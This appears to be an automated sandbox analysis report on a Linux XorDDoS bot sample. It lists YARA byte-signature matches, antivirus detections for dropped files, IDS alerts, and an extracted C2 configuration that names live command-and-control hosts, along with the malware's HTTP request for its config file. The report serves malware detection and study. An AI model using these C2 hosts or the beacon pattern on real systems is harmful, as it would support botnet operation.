    • 0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
    • 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
    HaJTqGiPpDLinux_Trojan_Xorddos_ba961ed2unknownunknown
    • 0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
    Click to see the 3 entries
    SourceRuleDescriptionAuthorStrings
    /usr/bin/ibkljkndlmJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /usr/bin/ibkljkndlmLinux_Trojan_Xorddos_2aef46a6unknownunknown
      • 0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
      /usr/bin/ibkljkndlmLinux_Trojan_Xorddos_0eb147caunknownunknown
      • 0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
      • 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
      /usr/bin/ibkljkndlmLinux_Trojan_Xorddos_884cab60unknownunknown
      • 0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
      • 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
      /usr/bin/ibkljkndlmLinux_Trojan_Xorddos_ba961ed2unknownunknown
      • 0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
      Click to see the 106 entries
      SourceRuleDescriptionAuthorStrings
      6233.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        6233.1.0000000008048000.00000000080cf000.r-x.sdmpLinux_Trojan_Xorddos_2aef46a6unknownunknown
        • 0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
        6233.1.0000000008048000.00000000080cf000.r-x.sdmpLinux_Trojan_Xorddos_0eb147caunknownunknown
        • 0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
        • 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
        6233.1.0000000008048000.00000000080cf000.r-x.sdmpLinux_Trojan_Xorddos_884cab60unknownunknown
        • 0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
        • 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
        6233.1.0000000008048000.00000000080cf000.r-x.sdmpLinux_Trojan_Xorddos_ba961ed2unknownunknown
        • 0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
        Click to see the 737 entries
        Timestamp:2024-08-20T15:33:13.222020+0200
        SID:2021022
        Severity:1
        Source Port:53
        Destination Port:45489
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-20T15:33:13.718862+0200
        SID:2021336
        Severity:1
        Source Port:35282
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: HaJTqGiPpDAvira: detected
        Source: /usr/bin/posifzmmhgAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/sxruomujjdAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/sotpizdssrAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/kigdktzeumAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/ibkljkndlmAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/lib/libudev.soAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/wvbxepjyjxAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/eqznayducjAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/qrabekbstrAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/mizdkrdyqjAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/iulapzbfpqAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/gnmftoxpzaAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/becqudbgmeAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/buxftyvhwpAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: HaJTqGiPpDMalware Configuration Extractor: XorDDoS {"C2 list": ["http://aaa.dsaj2a.org/config.rar\u00007.com:25", "ww.dnstells.com:25"]}
        Source: HaJTqGiPpDReversingLabs: Detection: 72%
        Source: /usr/bin/posifzmmhgJoe Sandbox ML: detected
        Source: /usr/bin/sxruomujjdJoe Sandbox ML: detected
        Source: /usr/bin/sotpizdssrJoe Sandbox ML: detected
        Source: /usr/bin/kigdktzeumJoe Sandbox ML: detected
        Source: /usr/bin/ibkljkndlmJoe Sandbox ML: detected
        Source: /usr/lib/libudev.soJoe Sandbox ML: detected
        Source: /usr/bin/wvbxepjyjxJoe Sandbox ML: detected
        Source: /usr/bin/eqznayducjJoe Sandbox ML: detected
        Source: /usr/bin/qrabekbstrJoe Sandbox ML: detected
        Source: /usr/bin/mizdkrdyqjJoe Sandbox ML: detected
        Source: /usr/bin/iulapzbfpqJoe Sandbox ML: detected
        Source: /usr/bin/gnmftoxpzaJoe Sandbox ML: detected
        Source: /usr/bin/becqudbgmeJoe Sandbox ML: detected
        Source: /usr/bin/buxftyvhwpJoe Sandbox ML: detected
        Source: HaJTqGiPpDJoe Sandbox ML: detected

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 8.8.8.8:53 -> 192.168.2.23:45489
        Source: Network trafficSuricata IDS: 2021336 - Severity 1 - ET MALWARE DDoS.XOR Checkin via HTTP : 192.168.2.23:35282 -> 23.253.46.64:80
        Source: global trafficTCP traffic: 192.168.2.23:55162 -> 23.235.171.197:25
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: global trafficHTTP traffic detected: GET /config.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: aaa.dsaj2a.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: aaa.dsaj2a.org
        Source: global trafficDNS traffic detected: DNS query: ww.dnstells.com
        Source: global trafficDNS traffic detected: DNS query: ww.gzcfr5axf7.com
        Source: global trafficDNS traffic detected: DNS query: ww.gzcfr5axf6.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 20 Aug 2024 13:33:08 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
        Source: HaJTqGiPpD, 6229.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6231.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6232.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6233.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6263.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6266.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6269.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6272.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6274.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6280.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6283.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6285.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6288.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6291.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6298.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6300.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6303.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6306.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6310.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6328.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6331.1.00000000ffecc000.00000000ffeed000.rw-.sdmpString found in binary or memory: http://aaa.dsaj2a.org/config.rar
        Source: HaJTqGiPpD, 6229.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6231.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6232.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6233.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6263.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6266.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6269.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6272.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6274.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6280.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6283.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6285.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6288.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6291.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6298.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6300.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6303.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6306.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6310.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6328.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6331.1.00000000ffecc000.00000000ffeed000.rw-.sdmpString found in binary or memory: http://aaa.dsaj2a.org/config.rar7.com:25
        Source: HaJTqGiPpD, posifzmmhg.17.dr, sxruomujjd.17.dr, sotpizdssr.17.dr, kigdktzeum.17.dr, ibkljkndlm.17.dr, libudev.so.17.dr, wvbxepjyjx.17.dr, eqznayducj.17.dr, qrabekbstr.17.dr, mizdkrdyqj.17.dr, iulapzbfpq.17.dr, gnmftoxpza.17.dr, becqudbgme.17.dr, buxftyvhwp.17.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

        DDoS

        barindex
        Source: Yara matchFile source: HaJTqGiPpD, type: SAMPLE
        Source: Yara matchFile source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6550.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6229, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6231, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6232, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6233, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6263, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6266, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6269, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6272, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6274, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6280, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6283, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6285, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6288, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6291, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6298, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6300, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6303, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6306, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6310, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6328, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6331, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6333, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6336, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6338, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6345, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6348, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6351, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6353, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6356, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6364, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6367, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6370, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6372, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6375, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6381, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6384, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6387, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6389, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6392, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6398, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6401, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6404, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6406, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6409, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6418, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6421, type: MEMORYSTR
